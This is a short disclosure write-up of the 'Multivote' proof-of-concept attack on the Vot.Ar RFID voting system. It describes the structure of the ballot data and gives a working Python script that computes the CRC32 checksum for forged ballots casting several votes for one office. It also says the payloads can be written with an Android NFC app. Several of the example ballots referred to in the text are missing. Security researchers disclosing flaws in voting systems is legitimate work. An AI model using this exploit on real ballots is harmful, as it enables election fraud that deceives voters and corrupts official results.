RFID ballots have a simple structure. The following example shows a ballot for “Representative” (REP), “Mayor” (MAY), and “Ward” (WRD) for province Buenos Aires (CABA):
And this is a ballot who casts three votes for category “Mayor”:
And this is one that casts 10 votes for “Mayor”:
There are other possibilities. The following ballot casts one vote for each category, and then adds six additional votes for “Mayor”:
Multi-vote ballot generator
The Python script below generates the correct CRC32 checksum for the RFID chip. Details about the format used in these ballots is available in some Github projects. These values can be added manually through an Android-based NFC application with write capabilities, like NFC-V.
from zlib import crc32 from struct import pack ballot="06CABA.1WRD1234REP5678MAY5678" # original ballot="06CABA.1WRD1234MAY5678MAY5678" # 2 MAY print "Message length: %02X" % len(ballot) print "CRC: %s" % ' '.join(map(lambda x:"%02X"%ord(x),pack("i",crc32(ballot)))) print "Ballot data: %s" % ' '.join(map(lambda x:"%02X"%ord(x),ballot))
Translated by: Juliano Rizzo
This is a short description of the Multivote attack Proof of Concept on the Vot.Ar system. More info in the full report.